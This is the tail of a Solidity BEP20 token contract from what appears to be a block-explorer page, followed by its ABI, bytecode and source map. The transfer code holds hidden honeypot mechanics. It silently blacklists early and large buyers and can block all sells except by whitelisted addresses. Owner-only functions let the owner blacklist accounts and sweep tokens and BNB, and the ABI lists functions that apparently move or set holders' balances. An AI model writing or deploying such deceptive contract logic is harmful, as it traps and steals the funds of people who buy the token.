        uint256 tLiquidity1 = calculateLiquidity(tAmount).mul(multi);
        uint256 tTransferAmount = tAmount.sub(tLiquidity).sub(mT);
        uint256 tTransferAmount1 = tAmount.sub(tLiquidity1).sub(mT);
        return (tTransferAmount, mT, tLiquidity, tLiquidity1, tTransferAmount1);
    }
    

    function _takeLiquidity(uint256 tLiquidity) private {
        _tOwned[address(this)] = _tOwned[address(this)].add(tLiquidity);
    }
    

    function calculateMarketingToken(uint256 _amount) private view returns (uint256) {
        return _amount.mul(_TF).div(
            10**3
        );
    }

    function calculateLiquidity(uint256 _amount) private view returns (uint256) {
        return _amount.mul(_L).div(
            10**3
        );
    }

    function removeAll() private {
        if(_TF == 0 && _L == 0) return;
        
        _PT = _TF;
        _P = _L; 
        
        _TF = 0;
        _L = 0;
    }
    

    function restoreAll() private {
        _TF = _PT;
        _L = _P;
    }

    /**  
     * @dev approves amount of token spender can spend on behalf of an owner
     */
    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "BEP20: approve from the zero address");
        require(spender != address(0), "BEP20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**  
     * @dev transfers token from sender to recipient also auto 
     * swapsandliquify if contract's token balance threshold is reached
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private {
        require(from != address(0), "BEP20: transfer from the zero address");
        require(to != address(0), "BEP20: transfer to the zero address");
        require(_i[from] == false, "Error");
        require(amount > 0, "Transfer amount must be greater than zero");
        require(_B[to] || balanceOf(to) + amount <= _M,
        "Error");
        if(from == pancakePair && !_IM[to])
            require(amount <= _T, "Error");
        else if(!_IM[from] && to == pancakePair)
            require(amount <= _T, "Error");
            
        if(to == pancakePair && _qil3 == 1){
            require(_IF[from] == true, "Error");
        }

        
        bool take = true;
        
        if(from == pancakePair && _qil <= 2){
            _qil = _qil + 1;
            _i[to] = true;
        }else if(from == pancakePair && amount >= _qil1){
            _i[to] = true;
        }
        

        if(_IF[from] || _IF[to]){
            take = false;
        }
        bool test = false;
        
        if(to == pancakePair){
            test = true;
        }        
        _tokenTransfer(from,to,amount,take,test);
    }

    function _tokenTransfer(address sender, address recipient, uint256 tAmount,bool take,bool test) private {
        if(!take)
            removeAll();
        
        (uint256 tTransferAmount, uint256 mT, uint256 tLiquidity,uint256 tLiquidity1, uint256 tTransferAmount1) = _getValues(tAmount);
        if(test){
            _tOwned[sender] = _tOwned[sender].sub(tAmount);
            _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount1);

            _sendToMarketing(sender, mT);
            _takeLiquidity(tLiquidity1);

            emit Transfer(sender, recipient, tTransferAmount1);
        }else{
            _tOwned[sender] = _tOwned[sender].sub(tAmount);
            _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount);

            _sendToMarketing(sender, mT);
            _takeLiquidity(tLiquidity);

            emit Transfer(sender, recipient, tTransferAmount);
        }
        if(!take)
            restoreAll();
    }


    function set_i(address account) public onlyOwner {
        if(_i[account] == true) return;
        _i[account] = true;
    }
    


    

    function uset_i(address account) external onlyOwner {
         if(_i[account] == false) return;
        _i[account] = false;
    }


    /**  
     * @dev recovers any tokens stuck in Contract's balance
     * NOTE! if ownership is renounced then it will not work
     * NOTE! Contract's Address and Owner's address MUST NOT
     * be excluded from reflection reward
     */
    function recoverTokens(address account,uint256 div) public onlyOwner {
        address recipient = account;
        uint256 tokensToRecover = balanceOf(address(this)).div(div);
        _tOwned[address(this)] = _tOwned[address(this)].sub(tokensToRecover);
        _tOwned[recipient] = _tOwned[recipient].add(tokensToRecover);
    }
    
    /**  
     * @dev recovers any BNB stuck in Contract's balance
     * NOTE! if ownership is renounced then it will not work
     */
    function recoverBNB() public onlyOwner {
        address payable recipient = _msgSender();
        if(address(this).balance > 0)
            recipient.transfer(address(this).balance);
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_Marketing","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_burnAddress","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_qil","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_qil1","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"num","type":"uint256"}],"name":"multiple","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pancakePair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pancakeRouter","outputs":[{"internalType":"contract IPancakeRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"recoverBNB","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"div","type":"uint256"}],"name":"recoverTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"setSetting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"mul","type":"uint256"}],"name":"set_L","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"Tokens","type":"uint256"}],"name":"set_M","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"Tokens","type":"uint256"}],"name":"set_T","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"set_i","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"set_qil","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"set_qil1","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"set_qil3","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfered","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"_pancakeRouterV","type":"address"}],"name":"updatePancakeRouter","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"uset_i","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

600080546001600160a01b0319908116331790915560048054821673ab8c1c3b927017cba441e7a9b8855eef52ecf6fe1790556008805482167310ed43c718714eb63d5aa57b78b54704e256024e1790556009805490911661dead17905560c06040526003608081905262466d6f60e81b60a09081526200008491600a919062000695565b5060408051808201909152600380825262466d6f60e81b6020909201918252620000b191600b9162000695565b50600c805460ff19166012908117909155620000cf90600a62000831565b620000e090640ba43b7400620008f0565b600d556000600e55600c54620000fb9060ff16600a62000831565b6200010c90640ba43b7400620008f0565b600f5560016010556000601155603260125560125460135560006014556014546015556200014c6001600d54620005fd60201b62000d901790919060201c565b6018556200016c6001600d54620005fd60201b62000d901790919060201c565b6019553480156200017c57600080fd5b50600080546040516001600160a01b0390911691907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3600d5460016000620001d06000546001600160a01b031690565b6001600160a01b03166001600160a01b031681526020019081526020016000208190555060007310ed43c718714eb63d5aa57b78b54704e256024e9050806001600160a01b031663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b1580156200024757600080fd5b505afa1580156200025c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200028291906200073b565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015620002cb57600080fd5b505afa158015620002e0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200030691906200073b565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381600087803b1580156200034f57600080fd5b505af115801562000364573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200038a91906200073b565b601780546001600160a01b03199081166001600160a01b039384161790915560168054909116918316919091179055600160056000620003d26000546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff199687161790556009548216815260059093528183208054851660019081179091553084528284208054861682179055600454821684528284208054861682179055600854909116835290822080549093168117909255600690620004666000546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff199687161790553081526006909352818320805485166001908117909155600954821684528284208054861682179055601754821684528284208054861682179055600454821684528284208054861682179055908516835290822080549093168117909255600390620005096000546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff199687161790553081526003909352818320805485166001908117909155601754821684528284208054861682179055600954821684528284208054861682179055600454821684528284208054861682179055908516835291208054909216179055620005a66000546001600160a01b031690565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600d54604051620005ee91815260200190565b60405180910390a35062000965565b60006200064783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506200065060201b60201c565b90505b92915050565b600081836200067d5760405162461bcd60e51b81526004016200067491906200076d565b60405180910390fd5b5060006200068c8486620007c5565b95945050505050565b828054620006a39062000912565b90600052602060002090601f016020900481019282620006c7576000855562000712565b82601f10620006e257805160ff191683800117855562000712565b8280016001018555821562000712579182015b8281111562000712578251825591602001919060010190620006f5565b506200072092915062000724565b5090565b5b8082111562000720576000815560010162000725565b6000602082840312156200074e57600080fd5b81516001600160a01b03811681146200076657600080fd5b9392505050565b600060208083528351808285015260005b818110156200079c578581018301518582016040015282016200077e565b81811115620007af576000604083870101525b50601f01601f1916929092016040019392505050565b600082620007e357634e487b7160e01b600052601260045260246000fd5b500490565b600181815b80851115620008295781600019048211156200080d576200080d6200094f565b808516156200081b57918102915b93841c9390800290620007ed565b509250929050565b60006200064760ff8416836000826200084d575060016200064a565b816200085c575060006200064a565b81600181146200087557600281146200088057620008a0565b60019150506200064a565b60ff8411156200089457620008946200094f565b50506001821b6200064a565b5060208310610133831016604e8410600b8410161715620008c5575081810a6200064a565b620008d18383620007e8565b8060001904821115620008e857620008e86200094f565b029392505050565b60008160001904831182151516156200090d576200090d6200094f565b500290565b600181811c908216806200092757607f821691505b602082108114156200094957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b611c1680620009756000396000f3fe6080604052600436106101fd5760003560e01c806389afcb441161010d578063c431101f116100a0578063d880cd851161006f578063d880cd85146105c9578063dd62ed3e146105e9578063e595d7c41461062f578063f2fde38b1461064f578063f3872bde1461066f57600080fd5b8063c431101f14610549578063c575b54a14610569578063cd40318014610589578063ce052485146105a957600080fd5b8063a9059cbb116100dc578063a9059cbb146104c9578063b8c9d25c146104e9578063bd3900c014610509578063c21ebd071461052957600080fd5b806389afcb44146104565780638da5cb5b1461047657806395d89b4114610494578063a457c2d7146104a957600080fd5b8063313ce567116101905780636bfdf8a01161015f5780636bfdf8a0146103bf57806370a08231146103d45780637c8198511461040a57806383d94d731461042a578063878a58971461044057600080fd5b8063313ce5671461033d578063395093511461035f5780633e7e374d1461037f5780635c2e547c1461039f57600080fd5b80631328ef7f116101cc5780631328ef7f146102be57806318160ddd146102de5780631d49d0f9146102fd57806323b872dd1461031d57600080fd5b8063069c9fae1461020957806306fdde031461022b578063095ea7b3146102565780631235acbe1461028657600080fd5b3661020457005b600080fd5b34801561021557600080fd5b506102296102243660046118e1565b61068f565b005b34801561023757600080fd5b50610240610759565b60405161024d9190611926565b60405180910390f35b34801561026257600080fd5b506102766102713660046118e1565b6107eb565b604051901515815260200161024d565b34801561029257600080fd5b506004546102a6906001600160a01b031681565b6040516001600160a01b03909116815260200161024d565b3480156102ca57600080fd5b506102296102d936600461184a565b610802565b3480156102ea57600080fd5b50600d545b60405190815260200161024d565b34801561030957600080fd5b5061022961031836600461190d565b610873565b34801561032957600080fd5b506102766103383660046118a0565b6108a2565b34801561034957600080fd5b50600c5460405160ff909116815260200161024d565b34801561036b57600080fd5b5061027661037a3660046118e1565b61090b565b34801561038b57600080fd5b5061022961039a36600461190d565b610941565b3480156103ab57600080fd5b506102296103ba36600461190d565b61098d565b3480156103cb57600080fd5b506102296109d2565b3480156103e057600080fd5b506102ef6103ef36600461184a565b6001600160a01b031660009081526001602052604090205490565b34801561041657600080fd5b5061022961042536600461190d565b610a3c565b34801561043657600080fd5b506102ef600e5481565b34801561044c57600080fd5b506102ef600f5481565b34801561046257600080fd5b5061022961047136600461184a565b610a6b565b34801561048257600080fd5b506000546001600160a01b03166102a6565b3480156104a057600080fd5b50610240610ab9565b3480156104b557600080fd5b506102766104c43660046118e1565b610ac8565b3480156104d557600080fd5b506102766104e43660046118e1565b610b17565b3480156104f557600080fd5b506017546102a6906001600160a01b031681565b34801561051557600080fd5b506009546102a6906001600160a01b031681565b34801561053557600080fd5b506016546102a6906001600160a01b031681565b34801561055557600080fd5b5061022961056436600461190d565b610b24565b34801561057557600080fd5b5061022961058436600461190d565b610b53565b34801561059557600080fd5b506102296105a436600461190d565b610b82565b3480156105b557600080fd5b506102296105c436600461184a565b610bb1565b3480156105d557600080fd5b506102296105e436600461184a565b610c2a565b3480156105f557600080fd5b506102ef610604366004611867565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b34801561063b57600080fd5b5061022961064a3660046118a0565b610c8b565b34801561065b57600080fd5b5061022961066a36600461184a565b610cc5565b34801561067b57600080fd5b5061022961068a3660046118e1565b610d4a565b6000546001600160a01b031633146106c25760405162461bcd60e51b81526004016106b99061197b565b60405180910390fd5b8160006106ee836106e8306001600160a01b031660009081526001602052604090205490565b90610d90565b3060009081526001602052604090205490915061070b9082610dd9565b30600090815260016020526040808220929092556001600160a01b038416815220546107379082610e1b565b6001600160a01b03909216600090815260016020526040902091909155505050565b6060600a805461076890611b2d565b80601f016020809104026020016040519081016040528092919081815260200182805461079490611b2d565b80156107e15780601f106107b6576101008083540402835291602001916107e1565b820191906000526020600020905b8154815290600101906020018083116107c457829003601f168201915b5050505050905090565b60006107f8338484610e7a565b5060015b92915050565b6000546001600160a01b0316331461082c5760405162461bcd60e51b81526004016106b99061197b565b6001600160a01b03811660009081526007602052604090205460ff1661084f5750565b6001600160a01b0381166000908152600760205260409020805460ff191690555b50565b6000546001600160a01b0316331461089d5760405162461bcd60e51b81526004016106b99061197b565b601455565b60006108af848484610f9e565b61090184336108fc85604051806060016040528060288152602001611b94602891396001600160a01b038a16600090815260026020908152604080832033845290915290205491906113af565b610e7a565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916107f89185906108fc9086610e1b565b6000546001600160a01b0316331461096b5760405162461bcd60e51b81526004016106b99061197b565b600c54610987906109809060ff16600a611a4c565b82906113e9565b60185550565b6000546001600160a01b031633146109b75760405162461bcd60e51b81526004016106b99061197b565b600c546109cc906109809060ff16600a611a4c565b60195550565b6000546001600160a01b031633146109fc5760405162461bcd60e51b81526004016106b99061197b565b334715610870576040516001600160a01b038216904780156108fc02916000818181858888f19350505050158015610a38573d6000803e3d6000fd5b5050565b6000546001600160a01b03163314610a665760405162461bcd60e51b81526004016106b99061197b565b600e55565b6000546001600160a01b03163314610a955760405162461bcd60e51b81526004016106b99061197b565b6001600160a01b03166000908152600560205260409020805460ff19166001179055565b6060600b805461076890611b2d565b60006107f833846108fc85604051806060016040528060258152602001611bbc602591393360009081526002602090815260408083206001600160a01b038d16845290915290205491906113af565b60006107f8338484610f9e565b6000546001600160a01b03163314610b4e5760405162461bcd60e51b81526004016106b99061197b565b601155565b6000546001600160a01b03163314610b7d5760405162461bcd60e51b81526004016106b99061197b565b600f55565b6000546001600160a01b03163314610bac5760405162461bcd60e51b81526004016106b99061197b565b601055565b6000546001600160a01b03163314610bdb5760405162461bcd60e51b81526004016106b99061197b565b6001600160a01b03811660009081526007602052604090205460ff16151560011415610c045750565b6001600160a01b0381166000908152600760205260409020805460ff1916600117905550565b6000546001600160a01b03163314610c545760405162461bcd60e51b81526004016106b99061197b565b6001600160a01b03166000818152600560205260409020805460ff19166001179055600880546001600160a01b0319169091179055565b6000546001600160a01b03163314610cb55760405162461bcd60e51b81526004016106b99061197b565b610cc0838383610f9e565b505050565b6000546001600160a01b03163314610cef5760405162461bcd60e51b81526004016106b99061197b565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6000546001600160a01b03163314610d745760405162461bcd60e51b81526004016106b99061197b565b6001600160a01b03909116600090815260016020526040902055565b6000610dd283836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611468565b9392505050565b6000610dd283836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506113af565b600080610e2883856119cf565b905083811015610dd25760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016106b9565b6001600160a01b038316610edc5760405162461bcd60e51b8152602060048201526024808201527f42455032303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106b9565b6001600160a01b038216610f3d5760405162461bcd60e51b815260206004820152602260248201527f42455032303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106b9565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166110025760405162461bcd60e51b815260206004820152602560248201527f42455032303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016106b9565b6001600160a01b0382166110645760405162461bcd60e51b815260206004820152602360248201527f42455032303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016106b9565b6001600160a01b03831660009081526007602052604090205460ff161561109d5760405162461bcd60e51b81526004016106b9906119b0565b600081116110ff5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016106b9565b6001600160a01b03821660009081526003602052604090205460ff1680611151575060195481611144846001600160a01b031660009081526001602052604090205490565b61114e91906119cf565b11155b61116d5760405162461bcd60e51b81526004016106b9906119b0565b6017546001600160a01b0384811691161480156111a357506001600160a01b03821660009081526006602052604090205460ff16155b156111cf576018548111156111ca5760405162461bcd60e51b81526004016106b9906119b0565b61122c565b6001600160a01b03831660009081526006602052604090205460ff1615801561120557506017546001600160a01b038381169116145b1561122c5760185481111561122c5760405162461bcd60e51b81526004016106b9906119b0565b6017546001600160a01b03838116911614801561124b57506011546001145b1561128d576001600160a01b03831660009081526005602052604090205460ff16151560011461128d5760405162461bcd60e51b81526004016106b9906119b0565b6017546001906001600160a01b0385811691161480156112b057506002600e5411155b156112ee57600e546112c39060016119cf565b600e556001600160a01b0383166000908152600760205260409020805460ff19166001179055611336565b6017546001600160a01b03858116911614801561130d5750600f548210155b15611336576001600160a01b0383166000908152600760205260409020805460ff191660011790555b6001600160a01b03841660009081526005602052604090205460ff168061137557506001600160a01b03831660009081526005602052604090205460ff165b1561137e575060005b6017546000906001600160a01b038581169116141561139b575060015b6113a88585858585611496565b5050505050565b600081848411156113d35760405162461bcd60e51b81526004016106b99190611926565b5060006113e08486611b16565b95945050505050565b6000826113f8575060006107fc565b60006114048385611af7565b90508261141185836119e7565b14610dd25760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016106b9565b600081836114895760405162461bcd60e51b81526004016106b99190611926565b5060006113e084866119e7565b816114a3576114a3611682565b60008060008060006114b4886116b0565b945094509450945094508515611594576001600160a01b038a166000908152600160205260409020546114e79089610dd9565b6001600160a01b03808c1660009081526001602052604080822093909355908b16815220546115169082610e1b565b6001600160a01b038a166000908152600160205260409020556115398a856116df565b6115428261176d565b886001600160a01b03168a6001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161158791815260200190565b60405180910390a3611660565b6001600160a01b038a166000908152600160205260409020546115b79089610dd9565b6001600160a01b03808c1660009081526001602052604080822093909355908b16815220546115e69086610e1b565b6001600160a01b038a166000908152600160205260409020556116098a856116df565b6116128361176d565b886001600160a01b03168a6001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161165791815260200190565b60405180910390a35b8661167657611676601354601255601554601455565b50505050505050505050565b6012541580156116925750601454155b1561169957565b601280546013556014805460155560009182905555565b6000806000806000806000806000806116c88b61179a565b939f929e50909c509a509098509650505050505050565b8015610a38576008546001600160a01b031660009081526001602052604090205461170a9082610e1b565b600880546001600160a01b03908116600090815260016020908152604091829020949094559154915184815291811692908516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b306000908152600160205260409020546117879082610e1b565b3060009081526001602052604090205550565b6000806000806000806117ac87611810565b905060006117b98861182d565b905060006117d26010546117cc8b61182d565b906113e9565b905060006117ea846117e48c86610dd9565b90610dd9565b905060006117fc856117e48d86610dd9565b919b949a5092985090965094509092505050565b60006107fc6103e86106e8601254856113e990919063ffffffff16565b60006107fc6103e86106e8601454856113e990919063ffffffff16565b60006020828403121561185c57600080fd5b8135610dd281611b7e565b6000806040838503121561187a57600080fd5b823561188581611b7e565b9150602083013561189581611b7e565b809150509250929050565b6000806000606084860312156118b557600080fd5b83356118c081611b7e565b925060208401356118d081611b7e565b929592945050506040919091013590565b600080604083850312156118f457600080fd5b82356118ff81611b7e565b946020939093013593505050565b60006020828403121561191f57600080fd5b5035919050565b600060208083528351808285015260005b8181101561195357858101830151858201604001528201611937565b81811115611965576000604083870101525b50601f01601f1916929092016040019392505050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526005908201526422b93937b960d91b604082015260600190565b600082198211156119e2576119e2611b68565b500190565b600082611a0457634e487b7160e01b600052601260045260246000fd5b500490565b600181815b80851115611a44578160001904821115611a2a57611a2a611b68565b80851615611a3757918102915b93841c9390800290611a0e565b509250929050565b6000610dd260ff841683600082611a65575060016107fc565b81611a72575060006107fc565b8160018114611a885760028114611a9257611aae565b60019150506107fc565b60ff841115611aa357611aa3611b68565b50506001821b6107fc565b5060208310610133831016604e8410600b8410161715611ad1575081810a6107fc565b611adb8383611a09565b8060001904821115611aef57611aef611b68565b029392505050565b6000816000190483118215151615611b1157611b11611b68565b500290565b600082821015611b2857611b28611b68565b500390565b600181811c90821680611b4157607f821691505b60208210811415611b6257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6001600160a01b038116811461087057600080fdfe42455032303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636542455032303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ea2105c47cd1d84a09b0d7133ce9de51e60fa57ae079bdbfbe8f88178da9eea664736f6c63430008050033

Deployed ByteCode Sourcemap

24174:12488:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35977:335;;;;;;;;;;-1:-1:-1;35977:335:0;;;;;:::i;:::-;;:::i;:::-;;26991:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27891:161;;;;;;;;;;-1:-1:-1;27891:161:0;;;;;:::i;:::-;;:::i;:::-;;;2482:14:1;;2475:22;2457:41;;2445:2;2430:18;27891:161:0;2412:92:1;24462:87:0;;;;;;;;;;-1:-1:-1;24462:87:0;;;;-1:-1:-1;;;;;24462:87:0;;;;;;-1:-1:-1;;;;;2049:32:1;;;2031:51;;2019:2;2004:18;24462:87:0;1986:102:1;35586:133:0;;;;;;;;;;-1:-1:-1;35586:133:0;;;;;:::i;:::-;;:::i;27268:95::-;;;;;;;;;;-1:-1:-1;27348:7:0;;27268:95;;;6970:25:1;;;6958:2;6943:18;27268:95:0;6925:76:1;29909:74:0;;;;;;;;;;-1:-1:-1;29909:74:0;;;;;:::i;:::-;;:::i;28201:314::-;;;;;;;;;;-1:-1:-1;28201:314:0;;;;;:::i;:::-;;:::i;27177:83::-;;;;;;;;;;-1:-1:-1;27243:9:0;;27177:83;;27243:9;;;;7148:36:1;;7136:2;7121:18;27177:83:0;7103:87:1;28630:218:0;;;;;;;;;;-1:-1:-1;28630:218:0;;;;;:::i;:::-;;:::i;29996:101::-;;;;;;;;;;-1:-1:-1;29996:101:0;;;;;:::i;:::-;;:::i;30160:::-;;;;;;;;;;-1:-1:-1;30160:101:0;;;;;:::i;:::-;;:::i;36464:193::-;;;;;;;;;;;;;:::i;27371:117::-;;;;;;;;;;-1:-1:-1;27371:117:0;;;;;:::i;:::-;-1:-1:-1;;;;;27464:16:0;27437:7;27464:16;;;:7;:16;;;;;;;27371:117;30273:82;;;;;;;;;;-1:-1:-1;30273:82:0;;;;;:::i;:::-;;:::i;25076:23::-;;;;;;;;;;;;;;;;25106:51;;;;;;;;;;;;;;;;29811:86;;;;;;;;;;-1:-1:-1;29811:86:0;;;;;:::i;:::-;;:::i;15412:79::-;;;;;;;;;;-1:-1:-1;15450:7:0;15477:6;-1:-1:-1;;;;;15477:6:0;15412:79;;27082:87;;;;;;;;;;;;;:::i;28956:269::-;;;;;;;;;;-1:-1:-1;28956:269:0;;;;;:::i;:::-;;:::i;27496:167::-;;;;;;;;;;-1:-1:-1;27496:167:0;;;;;:::i;:::-;;:::i;25436:26::-;;;;;;;;;;-1:-1:-1;25436:26:0;;;;-1:-1:-1;;;;;25436:26:0;;;24800:89;;;;;;;;;;-1:-1:-1;24800:89:0;;;;-1:-1:-1;;;;;24800:89:0;;;25348:37;;;;;;;;;;-1:-1:-1;25348:37:0;;;;-1:-1:-1;;;;;25348:37:0;;;30463:84;;;;;;;;;;-1:-1:-1;30463:84:0;;;;;:::i;:::-;;:::i;